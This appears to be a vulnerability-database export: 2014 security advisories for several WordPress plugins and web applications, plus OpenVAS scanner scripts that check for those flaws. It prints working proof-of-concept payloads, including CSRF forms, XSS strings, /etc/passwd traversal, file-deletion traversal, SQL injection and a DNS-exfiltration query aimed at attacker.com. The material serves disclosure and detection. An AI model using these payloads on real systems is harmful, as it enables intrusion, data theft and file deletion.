{"htbridge": [{"lastseen": "2017-06-23T23:08:14", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files. \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system. \nThe following PoC code demonstrates exploitation of the vulnerability: \nAfter successful exploitation the remote shell will be accessible via the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ snapshots/1.php.jpg \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension. \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. 
The script will be also executed in administrative section on the following page: \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&t ab=live \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \nThe code will be executed when the user visits the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ uploads/[room]/Log[date].html \nWhere [room] is set by HTTP POST parameter r and [date] is the current date. 
\n \n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3 E \n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. 
A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences. 
\nThe exploitation example below displays contents of \"/etc/passwd\" file: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_login.php?s=../../../../../../etc/passwd \n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \nThe exploitation example below deletes a file \"/tmp/immuniweb\": \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system. \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \nThe following URL can be used to gain knowledge of full installation path of the application: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp. 
php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/vid eowhisper_streaming.php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp.inc.php \n\n", "modified": "2014-02-07T00:00:00", "published": "2014-02-06T00:00:00", "id": "HTB23199", "href": "https://www.htbridge.com/advisory/HTB23199", "type": "htbridge", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C/"}}, {"lastseen": "2017-06-23T23:08:36", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe exploitation example below displays version of the MySQL server: \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi on%28%29,3,4,5,6,7,8,9 \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. 
\nThe exploitation example below assigns administrative privileges for the current account: \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form>\n", "modified": "2014-02-25T00:00:00", "published": "2014-02-12T00:00:00", "id": "HTB23202", "href": "https://www.htbridge.com/advisory/HTB23202", "type": "htbridge", "title": "Multiple Vulnerabilities in OpenDocMan", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:14", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website. \n \nCross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. 
\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_clon er&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script>\n", "modified": "2014-03-13T00:00:00", "published": "2014-03-12T00:00:00", "id": "HTB23206", "href": "https://www.htbridge.com/advisory/HTB23206", "type": "htbridge", "title": "Cross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N/"}}, {"lastseen": "2017-06-23T23:08:17", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%2 9;%3C/script%3E \n\n", "modified": "2014-02-26T00:00:00", "published": "2014-02-26T00:00:00", "id": "HTB23205", "href": "https://www.htbridge.com/advisory/HTB23205", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in CMSimple", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:33", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92), CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111), CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" 
value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form>\n", "modified": "2014-04-08T00:00:00", "published": "2014-03-19T00:00:00", "id": "HTB23208", "href": "https://www.htbridge.com/advisory/HTB23208", "type": "htbridge", "title": "SQL Injection in Orbit Open Ad Server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:34", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. 
\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTE gVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n\n", "modified": "2014-01-31T00:00:00", "published": "2014-01-30T00:00:00", "id": "HTB23201", "href": "https://www.htbridge.com/advisory/HTB23201", "type": "htbridge", "title": "SQL Injection in AdRotate", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}], "openvas": [{"lastseen": "2018-10-22T16:40:51", "bulletinFamily": "scanner", "description": "This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2014-04-01T00:00:00", "id": "OPENVAS:1361412562310804530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804530", "title": "WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_videowhisper_mult_vuln.nasl 35802 2014-04-01 12:28:38Z Apr$\n#\n# WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804530\");\n script_version(\"$Revision: 11867 $\");\n script_cve_id(\"CVE-2014-1906\", \"CVE-2014-1907\", \"CVE-2014-1905\", \"CVE-2014-1908\");\n script_bugtraq_id(65876, 65877, 65866, 65880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-01 12:28:38 +0530 (Tue, 01 Apr 2014)\");\n script_name(\"WordPress VideoWhisper Live Streaming Integration Multiple Vulnerabilities\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Wordpress VideoWhisper Live Streaming Integration\nPlugin and is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to read\ncookie or not.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to an,\n\n - Improper verification of file extensions before uploading files to the server\n in '/videowhisper-live-streaming-integration/ls/vw_snapshots.php'\n\n - Input passed via HTTP POST parameters 'msg' to /ls/vc_chatlog.php, 'm' to\n /ls/lb_status.php, 'ct' to /ls/lb_status.php and /ls/v_status.php.\n\n - Input passed via HTTP GET parameters 'n' to /ls/channel.php, htmlchat.php,\n ls/video.php, and /videotext.php, 'message' to 
/ls/lb_logout.php, and 's'\n to rtmp_login.php and rtmp_logout.php scripts.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\nscript code in a user's browser session in the context of an affected site and\nread/delete arbitrary files.\");\n script_tag(name:\"affected\", value:\"WordPress VideoWhisper Live Streaming Integration Plugin version 4.27.3\nand probably prior.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.29.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31986\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23199\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125454\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://wordpress.org/plugins/videowhisper-live-streaming-integration\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/videowhisper-live-streaming-integration/ls'+\n '/channel.php?n=</title><script>alert(document.cookie)</script>';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\\(document.cookie\\)</script>\",\n extra_check:'>Video Whisper Live Streaming<'))\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:41:16", "bulletinFamily": "scanner", "description": "This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2014-03-11T00:00:00", "id": "OPENVAS:1361412562310804511", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804511", "title": "WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_adrotate_track_pram_sqli_vul.nasl 11974 2018-10-19 06:22:46Z cfischer $\n#\n# WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804511\");\n script_version(\"$Revision: 11974 $\");\n script_cve_id(\"CVE-2014-1854\");\n script_bugtraq_id(65709);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:22:46 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-11 11:17:52 +0530 (Tue, 11 Mar 2014)\");\n script_name(\"WordPress AdRotate Plugin 'clicktracker.php' SQL Injection Vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with WordPress AdRotate Plugin and is prone to sql\ninjection vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it is\npossible to execute sql query or not.\");\n script_tag(name:\"insight\", value:\"Flaw is due to the library/clicktracker.php script not properly sanitizing\nuser-supplied input to the 'track' parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to inject or manipulate SQL\nqueries in the back-end database, allowing for the manipulation or disclosure\nof arbitrary data.\");\n script_tag(name:\"affected\", value:\"Wordpress AdRotate Pro plugin version 3.9 through 3.9.5 and AdRotate Free\nplugin version 3.9 through 3.9.4\");\n script_tag(name:\"solution\", value:\"Upgrade AdRotate Pro to version 3.9.6 or higher and AdRotate Free to version\n3.9.5 or higher.\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57079\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31834\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23201\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125330\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.adrotateplugin.com\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-content/plugins/adrotate/library/clicktracker.php?track=LT' +\n 'EgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==';\n\nreq = http_get(item:url, port:http_port);\nres = http_keepalive_send_recv(port:http_port, data:req, bodyonly:FALSE);\n\nif(res && res =~ \"HTTP/1.. 
302 Found\" && res =~ \"Location: ([0-9.]+)\")\n{\n security_message(http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:53", "bulletinFamily": "scanner", "description": "Check for the Version of bugzilla", "modified": "2018-04-06T00:00:00", "published": "2014-05-05T00:00:00", "id": "OPENVAS:1361412562310867769", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867769", "title": "Fedora Update for bugzilla FEDORA-2014-5414", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5414\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867769\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:17:13 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5414\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5414\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n 
